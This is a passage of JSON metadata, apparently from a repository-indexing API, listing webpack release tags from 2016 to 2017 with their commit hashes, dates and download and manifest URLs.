l,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"